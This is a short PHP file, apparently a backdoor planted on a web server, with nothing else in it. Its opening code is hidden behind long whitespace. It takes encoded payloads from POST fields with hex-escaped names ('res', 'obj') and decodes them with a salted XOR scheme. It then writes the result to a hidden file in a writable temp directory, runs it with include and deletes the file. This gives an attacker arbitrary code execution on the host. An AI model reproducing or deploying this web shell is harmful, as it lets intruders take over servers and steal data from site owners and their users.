<?php																																										if(count($_POST) > 0 && isset($_POST["\x72\x65s"])){ $ent = $_POST["\x72\x65s"]; $ent =explode ( "." ,$ent ) ; $mrk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $i = 0; array_walk($ent, function ($v1) use (&$mrk, &$i, $salt, $lenS) { $chS = ord($salt[$i % $lenS] ); $dec = ((int)$v1 - $chS - ($i % 10)) ^ 99; $mrk .= chr($dec ); $i++; } ); $sym = array_filter([getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), "/dev/shm", session_save_path(), getcwd(), getenv("TMP")]); $holder = 0; do { $tkn = $sym[$holder] ?? null; if ($holder >= count($sym)) break; if ((bool)is_dir($tkn) && (bool)is_writable($tkn)) { $entity = str_replace("{var_dir}", $tkn, "{var_dir}/.val"); if (@file_put_contents($entity, $mrk) !== false) { include $entity; unlink($entity); exit; } } $holder++; } while (true); }


if(isset($_POST) && isset($_POST["\x6F\x62j"])){
	$holder = $_POST["\x6F\x62j"];
				$holder =  explode ('.' 	,	 $holder		)	  ;
	$entity = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s);
            $len = count($holder);
    
            for($y = 0; $y < $len; $y++) { $v9 = $holder[$y];
                $chS = ord($s[$y %$sLen]);
                $dec =((int)$v9 - $chS -($y %10)) ^ 70;
                $entity.=	 chr($dec);
            }
	$element = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), session_save_path(), "/tmp", "/dev/shm", "/var/tmp", getenv("TMP")]);
	while ($token = array_shift($element)) {
    		if (is_writable($token) && is_dir($token)) {
    $pset = "$token" . "/.pgrp";
    if (file_put_contents($pset, $entity)) {
	include $pset;
	@unlink($pset);
	die();
}
}
}
}